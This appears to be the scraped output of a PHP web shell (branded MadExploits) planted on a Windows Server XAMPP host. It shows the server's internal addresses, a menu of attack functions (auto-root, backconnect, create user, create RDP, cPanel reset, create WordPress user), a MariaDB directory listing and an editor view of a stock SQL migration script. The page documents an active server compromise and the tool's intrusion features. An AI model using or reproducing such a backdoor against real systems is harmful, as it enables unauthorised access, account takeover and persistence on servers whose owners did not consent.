Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
mysql /
share /
[ HOME SHELL ]
Name
Size
Permission
Action
charsets
[ DIR ]
drwxrwxrwx
czech
[ DIR ]
drwxrwxrwx
danish
[ DIR ]
drwxrwxrwx
dutch
[ DIR ]
drwxrwxrwx
english
[ DIR ]
drwxrwxrwx
estonian
[ DIR ]
drwxrwxrwx
french
[ DIR ]
drwxrwxrwx
german
[ DIR ]
drwxrwxrwx
greek
[ DIR ]
drwxrwxrwx
hindi
[ DIR ]
drwxrwxrwx
hungarian
[ DIR ]
drwxrwxrwx
italian
[ DIR ]
drwxrwxrwx
japanese
[ DIR ]
drwxrwxrwx
korean
[ DIR ]
drwxrwxrwx
norwegian
[ DIR ]
drwxrwxrwx
norwegian-ny
[ DIR ]
drwxrwxrwx
polish
[ DIR ]
drwxrwxrwx
portuguese
[ DIR ]
drwxrwxrwx
romanian
[ DIR ]
drwxrwxrwx
russian
[ DIR ]
drwxrwxrwx
serbian
[ DIR ]
drwxrwxrwx
slovak
[ DIR ]
drwxrwxrwx
spanish
[ DIR ]
drwxrwxrwx
swedish
[ DIR ]
drwxrwxrwx
ukrainian
[ DIR ]
drwxrwxrwx
errmsg-utf8.txt
534.01
KB
-rw-rw-rw-
fill_help_tables.sql
1.43
MB
-rw-rw-rw-
install_spider.sql
1.68
KB
-rw-rw-rw-
maria_add_gis_sp.sql
1.7
KB
-rw-rw-rw-
maria_add_gis_sp_bootstrap.sql
1.68
KB
-rw-rw-rw-
mysql_performance_tables.sql
1.91
KB
-rw-rw-rw-
mysql_system_tables.sql
29.33
KB
-rw-rw-rw-
mysql_system_tables_data.sql
3.08
KB
-rw-rw-rw-
mysql_test_data_timezone.sql
10.17
KB
-rw-rw-rw-
mysql_test_db.sql
1.64
KB
-rw-rw-rw-
mysql_to_mariadb.sql
1.18
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql_to_mariadb.sql
-- Script that changes MySQL 5.7 privilege tables to MariaDB 10.x -- This should be run first with -- mysql --force mysql < mysql_to_mariadb.sql -- It's ok to ignore any errors, as these usually means that the tables are -- already fixed. -- After this script s run, one should run at least: -- mysql_upgrade --upgrade-system-tables -- to get the other tables in the mysql database fixed. -- Drop not existing columnms alter table mysql.user drop column `password_last_changed`, drop column `password_lifetime`, drop column `account_locked`; -- Change existing columns alter table mysql.user change column `authentication_string` `auth_string` text COLLATE utf8_bin NOT NULL; -- Add new columns alter table mysql.user add column `Password` char(41) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '' after `user`, add column `is_role` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N' after `auth_string`; alter table mysql.user add column `default_role` char(80) COLLATE utf8_bin NOT NULL DEFAULT '', add column `max_statement_time` decimal(12,6) NOT NULL DEFAULT '0.000000'; -- Fix passwords update mysql.user set `password`=`auth_string`, plugin='' where plugin="mysql_native_password";
Close